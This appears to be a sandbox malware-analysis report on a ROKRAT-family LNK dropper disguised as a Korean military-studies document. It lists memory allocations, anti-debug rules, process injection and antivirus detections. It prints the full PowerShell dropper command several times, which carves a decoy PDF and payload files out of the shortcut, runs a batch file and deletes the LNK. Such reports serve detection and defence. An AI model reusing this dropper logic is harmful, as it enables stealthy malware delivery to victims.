NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02981000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02982000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02983000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02984000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02985000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02986000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02987000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02988000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02989000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\한국군사학논총.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse . -File \| where {$_.extension -in $exs} \| where-object {$_.length -eq 0x031732EF} \| Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string \| Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString \| Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"&& exit
cmdline	C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
cmdline	C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse . -File \| where {$_.extension -in $exs} \| where-object {$_.length -eq 0x031732EF} \| Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string \| Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString \| Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 3, 2025, 10:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse . -File \| where {$_.extension -in $exs} \| where-object {$_.length -eq 0x031732EF} \| Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string \| Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString \| Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"&& exit
cmdline	C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
cmdline	C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse . -File \| where {$_.extension -in $exs} \| where-object {$_.length -eq 0x031732EF} \| Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string \| Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString \| Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2544 resumed a thread in remote process 2656
NtResumeThread April 3, 2025, 10:39 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2656	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Lionic	Trojan.WinLNK.Pantera.4!c
CTX	lnk.trojan.powecod
Skyhigh	BehavesLike.Dropper.tx
ALYac	Trojan.Agent.LNK.Gen
VIPRE	Heur.BZC.YAX.Pantera.190.62373884
K7GW	Trojan ( 0001140e1 )
K7AntiVirus	Trojan ( 0001140e1 )
Arcabit	Heur.BZC.YAX.Pantera.190.62373884
Symantec	Scr.Mallnk!gen13
ESET-NOD32	LNK/Agent.AGF
TrendMicro-HouseCall	Trojan.LNK.ROKRAT.ZYMC
Avast	LNK:Agent-HN [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.WinLNK.Powecod.c
BitDefender	Heur.BZC.YAX.Pantera.190.62373884
Rising	Trojan.Agent/LNK!1.AA03 (CLASSIC)
Emsisoft	Heur.BZC.YAX.Pantera.190.62373884 (B)
F-Secure	Malware.LNK/Susp.Gen
DrWeb	LNK.Muldrop.53
TrendMicro	Trojan.LNK.ROKRAT.ZYMC
Sophos	Troj/LnkObf-AH
SentinelOne	Static AI - Suspicious LNK
FireEye	Heur.BZC.YAX.Pantera.190.62373884
Google	Detected
Avira	LNK/Susp.Gen
Gridinsoft	Malware.U.Gen.tr
Microsoft	Trojan:Win32/WinLNK!MSR
ViRobot	LNK.S.Dropper.51852015
ZoneAlarm	Troj/LnkObf-AH
GData	Win32.Trojan-Dropper.LargeLnk.A@ioc
Varist	LNK/ABTrojan.DCOJ-
AhnLab-V3	Dropper/LNK.Generic
VBA32	Trojan.Link.Crafted
Tencent	Win32.Trojan.Powecod.Rimw
AVG	LNK:Agent-HN [Trj]
alibabacloud	Trojan:Win/Powecod.c

한국군사학논총.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All